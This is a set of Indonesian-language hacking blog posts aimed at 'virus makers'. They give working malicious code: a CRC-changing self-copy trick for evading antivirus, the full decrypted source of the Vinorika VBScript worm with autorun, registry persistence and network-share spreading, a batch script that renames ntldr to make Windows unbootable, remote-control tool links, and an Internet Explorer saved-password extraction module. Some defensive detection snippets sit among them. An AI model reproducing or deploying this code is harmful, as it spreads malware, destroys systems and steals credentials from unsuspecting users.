-> adalah mesin atau software yang dipasang atau diinstal di komputer agar mencatat semua aktivitas yang terjadi pada keyboard (bekerja diam diam alias tidak terketahui oleh kita secara kasat mata)
Fake Login
-> Halaman tiruan/palsu yang dibuat untuk mengelabui user, bertujuan untuk mencuri informasi penting dari user (eg. username, password, email). Seperti pada kasus pencurian email n password Friendster, Facebook, dll.

Fake Process
-> Proses tiruan yang dibuat untuk menyembunyikan nama proses asli, bertujuan untuk mengelabui admin sistem.
Seperti mem-fake "./backdoor" menjadi "usr/sbin/httpd", sehingga ketika di "ps -ax", proses "./backdoor" berubah menjadi "usr/sbin/httpd". Malicious Code/Script
-> Kode yg dibuat untuk tujuan jahat atau biasa disebut kode jahat.

Virus
-> Kode jahat yg sistim kerjanya seperti virus pada manusia, menggandakan diri dan seperti parasit menopang pada file yg diinfeksinya. File yg terinfeksi menjadi rusak atau ukurannya bertambah. Sekarang kode jenis ini akan sangat mudah terdeteksi pada aplikasi yg memeriksa crc32 dari dirinya.

Worm (Cacing)
-> Kode jahat yg sistim kerjanya seperti cacing, menggandakan diri dan menyebar, tidak menopang pada file. Kebanyakan di Indonesia adalah kode jenis ini.

Trojan (Horse)
-> Kode jahat yg sistim kerjanya seperti kuda trojan pada zaman kerajaan Romawi, masuk ke dalam sistem untuk mengintip dan mencuri informasi penting yg ada didalamnya kemudian mengirimnya kepada pemilik trojan.

tehnik mutasi virus

By ricky x sometime | At 05.54 | Label : | 0 Comments
Aku sarankan bagi kalian yang udah master jangan baca tutorial ini.
Just for newbie!


Oke langsung aja. Aku akan menjelaskan bagaimana sebuah virus memiliki lebih dari satu crc32. Dan yang pasti virus ini akan lolos dari cengkeraman antivirus yang berbasis crc32. (Nampaknya artikel ini bikin kontroversi aja!)

Agar sebuah virus punya banyak crc32 dan md5, virus tak membutuhkan �Filecopy� untuk berduplikasi atau dengan kata lain beranak-cucu.

Sekarang tinggalkan kebiasaanmu menggunakan �Filecopy� untuk duplikasi virus. Sekarang ada cara baru dan aku yakin udah banyak master virus yang tahu soal ini.
Biasanya dulu kamu diajari oleh �nenek moyangmu� untuk menduplikasikan virus dengan kode berikut ini:

Quote:Filecopy App.path & �\� & App.EXEName & �.exe�, bla bla bla & �.exe�
Otomatis dengan cara itu, virus cuma punya satu crc32 saja!
Tapi gimana kalau dengan kode dibawah ini:
Code:
Function MutasiKe (Lokasi As String)
ReDim KodeVirus(FileLen(App.Path & �\� & App.EXEName & �.exe�))As Byte
Open App.Path & �\� & App.EXEName & �.exe� For Binary As #1
Get #1, , KodeVirus
Close #1
Open Lokasi For Binary As #1
Put #1, , KodeVirus
Close #1
End Function
Private Sub Form_Load()
Bla bla bla�.
MutasiKe Environ$(�windir�) & �\Yooooo.exe�
End Sub
Dengan kode ini pasti crc32 virus induk dengan virus anak punya crc32 yang berbeda. Memang kejahatan IT selalu berkembang, Bung!! (Aku ngutip omongan seseorang(aku lupa orangnya siapa))
Tapi selalu saja ada yang bisa menangkal kejahatan!
Misalnya untuk mengatasi masalah virus (yang udah pake cara diatas) bisa dengan cara MD5. Meskipun crc32 berbeda, tapi MD5-nya tetap sama!
Bahkan lebih dari 10 crc32 sekalipun, tetap saja MD5-nya sama!

Mungkin sekian tutorial saya, Thanks buat newbie dan para master yang udah baca!!!

Analisa win32.trojan-gen....!

By ricky x sometime | At 05.53 | Label : | 0 Comments
Build in : Visual Basic
size : 60,0 KB (61.440 bytes) tanpa di pack
version : 1.0.0.1
internal name : wizardry
product name : WIZARDRY [hacktivist]

virus ini mempunyai 2 timer,

Quote:fungsi timer 1 untuk melakukan pengecekan ke network / folder yg tershare.

Quote:fungsi timer 2 untuk biasalah mengopy dirinya sendiri dengan nama lain ke berbagai directory.

SAAT PERTAMA KALI VIRUS INI AKTIF, DIA AKAN MEMBUAT SATU FILE BERXTENSION .EXE BERNAMA WIN 68 di directory D:

memanggil fungsi fungsi api sbb
Quote:Private Declare Sub RegisterServiceProcess Lib �kernel32
-> fungsinya untuk meregister service atau file virus tersebut agar tetap aktif walau computer sudah LogOff

Private Declare Function GetCurrentProcess Lib �kernel32? Alias �GetCurrentProcess�
-> fungsinya untuk mematikan process yang ada di list virus tersebut.

Private Declare Function GetCurrentProcessId Lib �kernel32? Alias �GetCurrentProcessId
-> fungsinya untuk menyembunyikan process dari aplikasi taskmanager atau Ctrl + Shift + Del List

yang jelas program ini juga mengkill software berdasarkan nama process dan caption.
alamat pembuat mungkin di http://www.marxist.com, http://www.communism.com, http://www.newyouth.com

file project asal dr pc si pembuat (^^)
c:\mitnick\warez\dir\WIZARDRY\wizardry.vbp

ne checksum virus tersebut:
Quote:SHA1 : C88B8FB6A3F89C5923496394D80093BFO774C57B
crc32 : 59ba5439
MD4 : 0D67A5230EE0069E325F79B777B99456
MD5 : 6B97BE307DEC17751E37CF2B8579DD4B

namanya::
Trojan.win32.wiza(PCTools)
Trojan Horse(symantec)
W32/Alcop.aq@mm(McAfee)

kategory virus ini menurut aku
LOW
karna tidak membuat autorun di registry maupun startup,
gak ada yg di disable
namun mengopy dirinya dgn nama-nama brikut dan di direktori berikut
Quote:C:\windows\3dtext~1.scr
c:\win 67.exe
c:\windows\system\3dtext~1.scr
c:\windows\911.scr
c:\windows\system\911.scr
c:\windows\3dflyi~1.scr
c:\windows\system\3dflyi~.scr
Semoga bermanfaat...

source kode virus vinorika ...!

By ricky x sometime | At 05.50 | Label : | 0 Comments
Semuanya udah pada tahu kan tentang vinorika??. Apalagi kalo dikaitkan dengan nama �yuyun�, �harrypotter� dan lain-lain. Itu satu paket semuanya.

Vinorika ini cukup unik. Alasannya:
1.memanfaatkan file-file shortcut untuk pengeksekusian
2.agak lain dengan virus vbs lainnya.
3.induk-nya hampir tidak memanfaatkan file �.vbs� (malah hanya menggunakan file �.db� dan �.inf� dan �.lnk�
4. terenkrip!

Tapi sebetulnya gak seluruhnya terenkrip kok. Tubuh virus ini terbagi dua! Bagian pertama tidak terenkrip sedangkan bagian kedua terenkrip.

Bagian pertama isinya sebagai berikut:

Code:
�============================
� Vinorika Go to Kediri�.
� Capek dhe!!
� Kupersembahkan Sebagai permintaan maafQ bwt Vinurika Rahmania yg ada di Kediri�.
� Hanya ini yang bisa Qlakukan�. tapi klo pean masih gk bisa maafin AQ ya mw gmana lgi.. he he!

�============================
On Error Resume Next
Dim fso, ws
Set fso = CreateObject(�scripting.filesystemobject�)
Set ws = CreateObject(�wscript.Shell�)
Set sh = CreateObject(�Shell.application�)
Set net = CreateObject(�wscript.network�)
Q=WScript.ScriptFullName
tmp=fso.GetSpecialFolder(2)
tn=fso.GetTempName
tmpt=tmp+�\�+tn
Set swt=WScript.Arguments
If swt.Count>0 Then
status=swt(0)
If status=�auto� Then
sh.Explore Left(WScript.ScriptFullName,3)
Else
status=Left(WScript.ScriptFullName,Len(WScript.ScriptFullName)-Len(WScript.ScriptName))+status
If fso.FolderExists(status) Then
sh.Explore status
Else
fso.CreateFolder status
sh.Explore status
End If
End If
Else
End If
Set QQ=fso.GetFile(Q)
Set Q1=QQ.OpenAsTextStream(1,0)
isiQ=Q1.Read(QQ.Size)
Q1.close
t1=InStr(1,isiQ,�Vinorika~!~2008?+� >>>�,0)+18
isiQ=Right(isiQ,Len(isiQ)-t1)
hsl=�"
For v=1 To Len(isiQ)
t=Asc(Mid(isiQ,v,1))
hsl=hsl+Chr(t Xor 5)
Next
If fso.FileExists(tmpt) Then fso.GetFile(tmpt).Attributes=0
Set temporary=fso.OpenTextFile(tmpt,2,True,0)
temporary.Write hsl
temporary.Close
ws.Run �WScript.exe //e:VBScript �+tmpt+� ��"+Q+�"�"

�����berakhir disini���

Kalo bagian pertama ini bisa aja dilihat kalo file �thumbs.db� direname jadi �.txt�. Dan semua orang bisa melakukan hal ini.

Oke. Oke. Ini semua belum berakhir teman�
Bagaimana dengan bagian kedua??? Bagian kedua terenkrip.
Ada satu baris yang membedakan dua bagian ini. Yaitu��
Quote:� � Vinorika~!~2008�
Si virus maker sengaja memberikan tanda untuk membedakan kedua bagian supaya ketika virus dieksekusi si virus tahu mana source yang harus didekrip.

Nah, kebetulan source yang dienkrip itu sudah aku dekrip kemarin. jadi aku bagi-bagi di sini deh,, :D
Source-nya bisa kalian manfaatkan dengan sebaik-baiknya.

Terus terang aja, setelah aku mendekrip semua source dibawah ini aku sanggup membuat vinorika tiruan. Dan aku yakin kalian semua pun bisa.

Code:
� Vinorika~!~
� send me an email to : Vinue_2007@yahoo.co.id
� Maafin Aq�Vinue
�=======================================================
On Error Resume Next
Dim fso, ws, status,status1, fly
Set fso = CreateObject(�scripting.filesystemobject�)
Set ws = CreateObject(�wscript.Shell�)
Set sh = CreateObject(�Shell.application�)
Set net = CreateObject(�wscript.network�)
fly=false
tmp=fso.GetSpecialFolder(2)
tn=fso.GetTempName
tmpt=tmp+�\�+tn
docx=ws.SpecialFolders(�MyDocuments�)

Set swt=WScript.Arguments
If swt.Count>0 Then
status=swt(0)
End If
if fso.fileexists(tmp+�\zvnita.ira�) then
set ira=fso.getfile(tmp+�\zvnita.ira�)
ira.attributes=0
ira.name=�shalihah.ira�
if ira.name=�shalihah.ira� then
ira.name=�zvnita.ira�
set ira=fso.opentextfile(tmp+�\zvnita.ira�,2,true)
else
fly=true
end if
else
set ira=fso.opentextfile(tmp+�\zvnita.ira�,2,true)
end if
Set AQ=fso.GetFile(status)
If fso.FileExists(tmpt) Then fso.GetFile(tmpt).Attributes=0
AQ.Copy tmpt,True
Set AQ=fso.GetFile(tmpt)
AQ.Attributes=39
anv=tmp+�\auto.exe�
If Not fso.FileExists(anv) Then AQ.Copy anv
Set auto=fso.GetFile(anv)
auto.attributes=0

Set aut=fso.OpenTextFile(tmp+an,2,True,0)
isi=�[autorun]>open=WScript.exe //e:VBScript thumb.db auto>shell\open=Open>shell\open\Command=WScript.exe //e:VBScript thumb.db auto>shell\open\Default=1>shell\explore=Explore>shell\explore\Command=WScript.exe //e:VBScript thumb.db auto�
isi=Replace(isi,�>�,vbCrLf)
aut.Write isi
aut.Close
auto.Attributes=39

ltkc=sh.Namespace(&H1c&).Self.path + �\Microsoft\CD Burning�
if fso.folderexists(ltkc) then
AQ.Copy ltkc+�\thumb.db�,True
auto.Copy ltkc+�\autorun.inf�,True
If fso.FileExists(docx+�\database.mdb�) Then fso.GetFile(docx+�\database.mdb�).Attributes=0
AQ.Copy docx+�\database.mdb�,True
end if
regQ
Set rara=UNISKA

Hertz False
If Day(Now)3 Then rekursif docx,1 Else rekursif docx,3

call attack_net
Hertz True

Sub rekursif(path,dp)
On Error Resume Next
dropf path
wscript.sleep 50
If dp>0 Then
For Each fldr1 In fso.GetFolder(path+�\�).SubFolders
rekursif fldr1.Path, dp-1
Next
End If
End Sub

Sub dropf(path)
On Error Resume Next
if day(now)=17 and month(now)=1 then
rara.copy path+�\Maafin AQ Vinurika Rahmania^_^!.rtf�
for pp=1 to 100
rara.copy path+�\Maafin A_Q Vivi..� & pp & �.xls�
rara.copy path+�\MaafinQ y Uplix..� & pp & �.htm�
rara.copy path+�\Maafin Aku Vee..� & pp & �.jpg�
rara.copy path+�\Sorry Vinue..� & pp & �.mp3?
wscript.sleep 500
next
rara.copy path+�\Vinorika.rtf�
end if

g1=path+�\autorun.inf�
g2=path+�\Thumb.db�
If fso.FileExists(g1) Then
Set g11=fso.GetFile(g1)
If g11.Attributes39 Then
g11.Attributes=0
auto.Copy path+�\autorun.inf�,True
end if
else
auto.Copy path+�\autorun.inf�,True
end if

If fso.FileExists(g2) Then
Set g12=fso.GetFile(g2)
If g12.Attributes39 Then
g12.Attributes=0
AQ.Copy path+�\Thumb.db�,True
end if
else
AQ.Copy path+�\Thumb.db�,True
End If

If Not fso.FileExists(path+�\Microsoft.lnk�) Then
shorZvnita path+�\Microsoft�,�Microsoft�
drop=Array(�New Harry Potter and��,�New Folder�,�SuratQ�,�Zanya Zulkarnaen�,�Game�,�Zvnita ir4?,�Download�,�DataQ�,�Kediri�)
ww=1
For Each d In drop
If Day(now) Mod 3 = ww Then shorZvnita path+�\�+d,d
wscript.sleep 60
ww=ww+1
Next
r=0
For Each fldr In fso.GetFolder(path+�\�).SubFolders
shorZvnita path+�\�+�Shortcut to �+fldr.name+�.lnk�,fldr.Name
wscript.sleep 60
If r>3 Then
Exit For
End if
r=r+1
Next
End If
End Sub

Sub shorZvnita(path,trgt)
Set shor=ws.CreateShortcut(path+�.lnk�)
shor.iconlocation=�shell32.dll,3?
shor.targetpath=�wscript.exe�
shor.arguments=�//e:VBScript thumb.db ��"+trgt+�"�"
shor.save
End Sub

function attack_net()
On Error Resume Next
err.clear
Set objFolder = sh.Namespace(&H13&)
Set colItems = objFolder.Items
For Each strFileName in objFolder.Items
t= objFolder.GetDetailsOf(strFileName, 14)
if err.number>0 then
exit function
end if
rekursif t,4
Next
End function

Sub tdr()
On Error Resume Next
err.clear
WScript.Sleep 180000
if err.number>0 then wscript.quit
End Sub

function UNISKA()
On error resume next
x=vbcrlf
adv=�Aztig Present^_^!>>Bukan dari tulang ubun ia dicipta>karna berbahaya membiarkannya dalam sanjung dan puja>tak juga dari tulang kaki>karna nista membuatnya diinjak dan diperbudak>tapi dari tulang rusuk bagian kiri>dekat ke hati untuk disayangi>dekat ke tangan untuk dilindungi>>(dikutip dr: Agar Bidadari Cemburu Padamu)>>>�"Janganlah kamu bersikap lemah, dan janganlah (pula) kamu bersedih hati, padahal kamulah>orang-orang yang paling tinggi (derajatnya), jika kamu orang-orang yang beriman.�">(QS. Ali Imran:139)>>>Katakanlah kepada orang laki-laki yang beriman: ��Hendaklah mereka menahan pandanganya, >dan memelihara kemaluannya; yang demikian itu adalah lebih suci bagi mereka, >sesungguhnya Allah Maha Mengetahui apa yang mereka perbuat.�" (QS. An Nur:30)>>Katakanlah kepada wanita yang beriman: ��Hendaklah mereka menahan pandangannya, >dan kemaluannya, dan janganlah mereka menampakkan perhiasannya, kecuali yang >(biasa) nampak dari padanya. Dan hendaklah mereka menutupkan kain kudung >kedadanya�.�" (QS. An Nur:30)>>sampaikan salam maafQ bwt: Vinurika Rahmania..[@_@]>The Repvblik maker Return in Kediri 2008>vinue_2007@yahoo.co.id�
adv=replace(adv,�>�,x)
set vivi=fso.opentextfile(tmp+�\v.doc�,2,true)
vivi.write adv
vivi.close
set UNISKA=fso.getfile(tmp+�\v.doc�)
end function

Sub regQ()
On Error Resume Next
if day(now)=1 then
ws.RegWrite �HKCR\CLSID\{11111111-2222-3333-4444-555555555555}\�, �Betapa indahnya kalian, andai berjilbab spertiQ�(Vinorika)^_^!�
ws.RegWrite �HKCR\CLSID\{11111111-2222-3333-4444-555555555555}\DefaultIcon\�,�shell32.dll,48?
ws.RegWrite �HKCR\CLSID\{11111111-2222-3333-4444-555555555555}\ShellFolder\Attributes�,0,�REG_DWORD�
ws.regwrite �HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{11111111-2222-3333-4444-555555555555}\�,�"
end if
ws.RegWrite �HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Explorer�,�Wscript.exe //e:VBScript �+docx+�\database.mdb�
End Sub

Sub Hertz(ooo)
On Error Resume Next
do
For Each drv In fso.Drives
If drv.DriveType=1 Then
rekursif drv.Path,4
Else
rekursif drv.Path,2
End if
Next
if fly=false then
tdr
else
wscript.quit
end if
regQ
If ooo=False Then
Exit Do
End If
loop
End Sub

����� berakhir disini����-
Kalau kalian Cuma merename file induk virus mungkin source diatas gak mungkin bisa kalian temukan.

untuk mendeteksi shortcut ne virus aku pake cara ini:
Gantikan fileshortcut dibawah menjadi alamat file shortcut virus vinorika.
Code:
Open fileshortcut For Binary As #1
filedata = Space$(LOF(1))
Get #1, , filedata
Close #1
Open �D:\sampel.txt� for binary as #1
Put #1,, filedata
Close #1
Lalu setelah dijalankan, coba lihat file �D:\sampel.txt�. nah itulah isi perut sesungguhnya dari file shortcut Vinorika.
Lalu untuk penerapannya pada antivirus? Silakan ambil string yang paling kamu curigai.
Kalau aku sendiri pake string:
777363726970742E657865 (dalam bentuk hexadecimal. Silakan ubah sendiri ke bentuk ASCII)
Dan aku sendiri yakin string yang satu ini cukup ampuh dijadikan signature.

Jujur aja, banyak teman-temanku yang kena virus ini. Dan mereka semua benci dengan PembuatVirus Vinorika.
Kepada PembuatVirus Vinorika: �Sebagai rasa balas dendam, mewakili seluruh teman-temanku, aku ucapkan �F*ck you!�...

trik cegah segala variant conficker ...

By ricky x sometime | At 05.48 | Label : | 0 Comments
Ini hanyalah trik�

ini adalah trik yang termasuk kontroversial.. Ngakak
Ini Cuma buat mencegah virus Conficker yang masuk lewat flashdisk cuy. Dan dijamin �hampir� (kira-kira 99% lah) semua varian Conficker akan diblok. Sekali lagi ingat! Ini Cuma untuk conficker yang masuk lewat flashdisk�

Sebelumnya perlu kamu tahu kalo sekarang sudah banyak sekali jenis conficker yang saya dapatkan. Dan sudah aku koleksi di rumah�.
Gak tahu lah ntah itu benar conficker atau bukan. Kemungkinan besar banyak orang sekarang ini sok-sok buat virus dengan nama yang sama dengan Conficker.
Filenamenya �jwgkvsq.vmx� cuy!!!

Oke kita anggap saja itu semua memang benar Virus Conficker�

Sebelum masuk ke inti artikel ini, ada yang mau kusampein. Sekitar beberapa hari yang lalu, setelah googling berjam-jam aku dapat code seperti berikut.

Conficker.A
Code:

Quote:alert tcp any any -> $HOME_NET 445 (msg:
�conficker.a shellcode�; content: �|e8 ff ff ff ff c1|^|8d|N|10
80|1|c4|Af|81|9EPu|f5 ae c6 9d a0|O|85 ea|O|84 c8|O|84 d8|O|c4|O|9c
cc|IrX|c4 c4 c4|,|ed c4 c4 c4 94|& $HOME_NET 445 (msg: �conficker.b shellcode�;
content: �|e8 ff ff ff ff c2|_|8d|O|10 80|1|c4|Af|81|9MSu|f5|8|ae c6 9d
a0|O|85 ea|O|84 c8|O|84 d8|O|c4|O|9c cc|Ise|c4 c4 c4|,|ed c4 c4 c4
94|&
c5 bc ea 95|\;|b3 c0 96 96 95 92 96|\;|f3|\;|24 |i|95 92|QO|8f f8|O|88
cf bc c7 0f f7|2I|d0|w|c7 95 e4|O|d6 c7 17 cb c4 04 cb|{|04 05 04 c3 f6
c6 86|D|fe c4 b1|1|ff 01 b0 c2 82 ff b5 dc b6 1f|O|95 e0 c7 17 cb|s|d0
b6|O|85 d8 c7 07|O|c0|T|c7 07 9a 9d 07 a4|fN|b2 e2|Dh|0c b1 b6 a8 a9 ab
aa c4|]|e7 99 1d ac b0 b0 b4 fe eb eb|"; sid: 2000002; rev: 1;)

Katanya sih itu jejak dari si Conficker. Gak tahu betul atau gak. Periksa sendiri aja ya..
Sebagian code diatas itu dalam bentuk Hexa.

Oke langsung ke inti.
Biasanya kalo conficker nginfeksi flashdisk, si Conficker bikin file berikut:
Quote:-File autorun
- jwgkvsq.vmx
-Folder RECYCLER
-folder S-5-3-42-2819952290-8240758988-879315005-3665
(Besok-besok kalian periksa aja ya�)

Tiga hal yang perlu diperhatikan dari ciri-ciri Conficker.
Quote:-induk-nya (yang ada di flashdisk) selalu berfilename �jwgkvsq.vmx�
-ukuran induknya selalu diatas 150 KB
-ukuran file autorun.inf selalu diatas 55 KB

Yeah, aku yakin sebenarnya sudah banyak yang sadar akan 3 hal itu. Tapi yang jelas trik ini ampuh untuk varian-varian conficker loh.

Atau lebih gampangnya saja aku akan tuliskan code-nya yah�

Quote:Public Function IsConficker(namafile as string) as Boolean
Dim namaAja() as String
namaAja() = split(namafile, �\�)
Select case Lcase(namaAja(Ubound(namaAja)))
Case �jwgkvsq.vmx�
If filelen(namafile) > 153600 then IsConficker = True
Case �autorun.inf�
If filelen(namafile) > 56320 then IsConficker = True
Case else
Exit function
End select
End Function

Trik ini belum ku implementasikan pada HN-AV. Yah karena udah terlalu banyak heuristic-heuristic aneh yang kutambah, masa yang ini juga kupake. He he he .Tapi liat nantilah.

Kalo kalian rasa code ini ampuh, silakan tambahkan code ini pada antivirus kalian. Bisa aja berkat code ini antivirus kalian bisa selangkah lebih maju daripada HN antivirus.

Tapi code ini juga gak luput dari False Alarm. Dan biasanya setelah membaca artikel ini ada orang yang pengen bikin virus-virus palsu yang make ciri-ciri conficker di atas. Tujuan mereka hanya untuk membuktikan kalo code ini mengakibatkan false alarm. Yaahh.. biarkan saja lah mereka.good luck...

Cara mempercepat eksekusi virus

By ricky x sometime | At 05.46 | Label : | 0 Comments
Kamu virus maker?
Nih ada artikel gimana caranya mempercepat eksekusi virus dengan visual basic 6. Artikel ini hanya untuk newbie saja. Yang sudah expert gak usah baca cuy.

Mempercepat eksekusi maksudnya mempersingkat waktu saat menghidupkan virus buatanmu.
Biasanya virus yang udah kompleks terkadang butuh waktu saat eksekusi. Gak usah dulu bicara virus, kita misalkan aja dulu program buatanmu dari VB.
Andaikan softwaremu sangat kompleks biasanya saat dihidupkan ada jenjang waktu beberapa detik sebelum softwaremu muncul.
Atau pernah gak kamu ngidupin suatu software apa saja butuh waktu beberapa detik sebelum softwarenya muncul?

Itulah yang kita bahas. Gimana caranya mempersingkat waktu eksekusi. Ini tergantung pada code yang kamu gunakan.
Coba bandingkan code berikut


Quote:If Kondisi Then Lakukan
Atau
If Kondisi Then
Lakukan
End if

Keduanya sama-sama fungsi if dan sama-sama melakukan tindakan �Lakukan� dengan syarat �kondisi�. Tapi pertanyaannya mana yang lebih efektif?
Sebenarnya yang lebih cepat code yang kedua daripada code yang pertama.

Gak percaya?

Kita bandingkan ya cuy.
Buka VB6-mu lalu buatlah 2 tombol �Command�.dengan caption �Code Pertama� dan �Code Kedua�. Kira-kira gambarnya seperti dibawah ini:

[Image: 27804_120989217930472_100000581828317_20...5068_n.jpg]

Untuk tombol code pertama ketik kode berikut:
Quote:waktu = Timer
Dim misal As Boolean
misal = True
For e = 1 To 500000000
If misal = True Then
misal = True
End If
Next

waktu = Timer � waktu
MsgBox Format(waktu, �00:00:00.00?)

Untuk Tombol code kedua ketik kode berikut:
Quote:waktu = Timer
Dim misal As Boolean
misal = True
For e = 1 To 500000000
If misal = True Then misal = True
Next

waktu = Timer � waktu
MsgBox Format(waktu, �00:00:00.00?)

Setelah dilakukan percobaan ternyata tombol code pertama membutuhkan waktu 45 detik setelah dilakukan perulangan 500 juta kali. Sedangkan tombol code kedua membutuhkan waktu 53 detik. (Percobaan ini kulakukan di komputerku, mungkin saja di komputer kalian berbeda�)

Jadi kesimpulannya:
Quote:Code fungsi if:
If begini then
Lakukan
End if

Lebih cepat (meskipun hanya sepersekian detik) dibandingkan
If begini then lakukan

Selain fungsi if masih ada lagi� seperti fungsi vbNullstring.

Lebih cepat code:
Quote:Teks = VbNullString
Daripada
Teks = ��

Yah mungkin dengan percobaan saya tadi, kalian semua bisa mencoba percobaan lainnya..

Cara lumpuhkan windows dengan script kurang dari 1kb

By ricky x sometime | At 05.41 | Label : | 0 Comments
coba copy source code brikut.

Code:
cd %SYSTEMDRIVE%\ 
attrib ntldr -S -H
ren ntldr baibai
move /Y baibai %systemroot
shutdown -r -t 1 -f

script d atas adlh inti dari aplikasi "gutbai.exe" milik x-code.
sisanya adalah komentar" yg ad d aplikasi ini.

ckup skian dan trims

Kumpulan Source Visual Basic!!!

By ricky x sometime | At 05.37 | Label : | 0 Comments
Di bawah ini adalah beberapa source code yang saya dapatkan dari teman saya di forum sebelah(x-c*de).
oke langsung aja kalo ada yang punya lagi sare aja di sini.

Youtube Video Downloader


Code:
http://www.ziddu.com/download/10767438/YoutubeDownloader.zip.html


diatas adalah source code bagaimana membuat sebuah program yang bisa mengunduh file video langsung dari Youtube. semoga berguna.

Cara penggunaan.
masuk ke youtube.com .pilih video yang akan di download, copy paste linknya ke program

Pertukaran File dalam jaringan

Code:
http://www.ziddu.com/download/10912553/ConnectionMonitor.zip.html

diatas adalah source code Visual Basic 6.0 bagaimana penerapan transfer dan menerima file melalui jaringan. diterapkan dengan metode client server.

Monk v.1 - Simple PC remote

Code:
http://www.ziddu.com/download/10706854/Monk1.0.zip.html

Monk is a simple program that lets you play pranks on your friends. The creator of this program is not responsible for any problems this may cause.

StealtEye - Remote Screen Capture

Code:
http://www.ziddu.com/download/10707184/stealtheye.zip.html


StealthEye adalah sebuah remote screen Capture tool yaitu program yang dapat menangkap gambar pada komputer remote dan menampilkan gambar pada komputer lokal. Anda bisa melihat driver video card dari komputer yang di-remote., Anda memerlukan Dijpg.dll dalam sistem dir supaya program dapat bekerja.

Remote File Manager


Code:
http://www.ziddu.com/download/10707383/RemoteFileMan.zip.html

Remote File Manager adalah program berbasis Client/server yang memungkinkan Anda untuk mengelola file di komputer lain melalui Winsock. Hal ini termasuk: file upload, download file, menghapus file, menghapus direktori, mendapatkan informasi file, dan mengeksekusi file.

Didalam file zip juga terdapat kontrol transfer file (pengirim & penerima) yang datang dilampirkan dengan program ini.

Internet Explorer vers.8 Password Recovery

Download
Quote:Http://www.ziddu.com/download/10724860/E...3.rar.html

Source code VB 6.0. mengembalikan password yang tersimpan dalam Internet explorer v.8

Form
[-]sebuah textbox
[-]sebuah command button
Source

Code:
Option Explicit

Private Sub Command1_Click()
    Text1.Text = mIEPass.GetIE & vbCrLf & "Done..."
End Sub

Module
Beri nama module menjadi mIEPass
source

Quote:Option Explicit

Private Declare Sub CopyBytes Lib "msvbvm60" Alias "__vbaCopyBytes" (ByVal Size As Long, Dest As Any, Source As Any)
Private Declare Function CryptUnprotectData Lib "crypt32" (ByRef pDataIn As DATA_BLOB, ByVal ppszDataDescr As Long, ByVal pOptionalEntropy As Long, ByVal pvReserved As Long, ByVal pPromptStruct As Long, ByVal dwFlags As Long, ByRef pDataOut As DATA_BLOB) As Long
Private Declare Function RegOpenKeyEx Lib "advapi32" Alias "RegOpenKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long
Private Declare Function RegEnumValue Lib "advapi32" Alias "RegEnumValueA" (ByVal hKey As Long, ByVal dwIndex As Long, ByVal lpValueName As String, lpcbValueName As Long, ByVal lpReserved As Long, lpType As Long, lpData As Byte, lpcbData As Long) As Long
Private Declare Function RegQueryValueEx Lib "advapi32" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, lpData As Any, lpcbData As Long) As Long
Private Declare Function CryptAcquireContext Lib "advapi32" Alias "CryptAcquireContextA" (ByRef phProv As Long, ByVal pszContainer As Long, ByVal pszProvider As String, ByVal dwProvType As Long, ByVal dwFlags As Long) As Long
Private Declare Function CryptCreateHash Lib "advapi32" (ByVal hProv As Long, ByVal Algid As Long, ByVal hKey As Long, ByVal dwFlags As Long, ByRef phHash As Long) As Long
Private Declare Function CryptHashData Lib "advapi32" (ByVal hHash As Long, ByVal pbData As Long, ByVal dwDataLen As Long, ByVal dwFlags As Long) As Long
Private Declare Function CryptGetHashParam Lib "advapi32" (ByVal hHash As Long, ByVal dwParam As Long, ByVal pByte As Long, ByRef pdwDataLen As Long, ByVal dwFlags As Long) As Long
Private Declare Function CryptSignHash Lib "advapi32" Alias "CryptSignHashA" (ByVal hHash As Long, ByVal dwKeySpec As Long, ByVal sDescription As Long, ByVal dwFlags As Long, ByVal pbSignature As Long, ByRef pdwSigLen As Long) As Long
Private Declare Function CryptDestroyHash Lib "advapi32" (ByVal hHash As Long) As Long
Private Declare Function CryptReleaseContext Lib "advapi32" (ByVal hProv As Long, ByVal dwFlags As Long) As Long
Private Declare Function CredEnumerate Lib "advapi32" Alias "CredEnumerateW" (ByVal lpszFilter As Long, ByVal lFlags As Long, ByRef pCount As Long, ByRef lppCredentials As Long) As Long
Private Declare Function FindFirstUrlCacheEntry Lib "wininet" Alias "FindFirstUrlCacheEntryA" (ByVal lpszUrlSearchPattern As String, lpFirstCacheEntryInfo As Any, lpdwFirstCacheEntryInfobufDataerSize As Long) As Long
Private Declare Function FindNextUrlCacheEntry Lib "wininet" Alias "FindNextUrlCacheEntryA" (ByVal hEnumHandle As Long, lpNextCacheEntryInfo As Any, lpdwNextCacheEntryInfobufDataerSize As Long) As Long
Private Declare Function lstrlenA Lib "kernel32" (ByVal ptr As Any) As Long
Private Declare Function lstrcpyA Lib "kernel32" (ByVal RetVal As String, ByVal ptr As Long) As Long
Private Declare Function SysAllocString Lib "oleaut32" (ByVal pOlechar As Long) As String

Private Type FILETIME
dwLowDateTime As Long
dwHighDateTime As Long
End Type
Private Type StringIndexHeader
dwWICK As Long
dwStructSize As Long
dwEntriesCount As Long
dwUnkId As Long
dwType As Long
dwUnk As Long
End Type
Private Type StringIndexEntry
dwDataOffset As Long
ftInsertDateTime As FILETIME
dwDataSize As Long
End Type
Private Type DATA_BLOB
cbData As Long
pbData As Long
End Type
Private Type CREDENTIAL
dwFlags As Long
dwType As Long
lpstrTargetName As Long
lpstrComment As Long
ftLastWritten As FILETIME
dwCredentialBlobSize As Long
lpbCredentialBlob As Long
dwPersist As Long
dwAttributeCount As Long
lpAttributes As Long
lpstrTargetAlias As Long
lpUserName As Long
End Type
Private Type INTERNET_CACHE_ENTRY_INFO
dwStructSize As Long
lpszSourceUrlName As Long
lpszLocalFileName As Long
CacheEntryType As Long
dwUseCount As Long
dwHitRate As Long
dwSizeLow As Long
dwSizeHigh As Long
LastModifiedTime As FILETIME
ExpireTime As FILETIME
LastAccessTime As FILETIME
LastSyncTime As FILETIME
lpHeaderInfo As Long
dwHeaderInfoSize As Long
lpszFileExtension As Long
dwExemptDelta As Long
End Type

Private Const NORMAL_CACHE_ENTRY As Long = &H1
Private Const URLHISTORY_CACHE_ENTRY As Long = &H200000
Private Const HKEY_CURRENT_USER As Long = &H80000001
Private Const IE_KEY As String = "Software\Microsoft\Internet Explorer\IntelliForms\Storage2"
Private Const READ_CONTROL As Long = &H20000
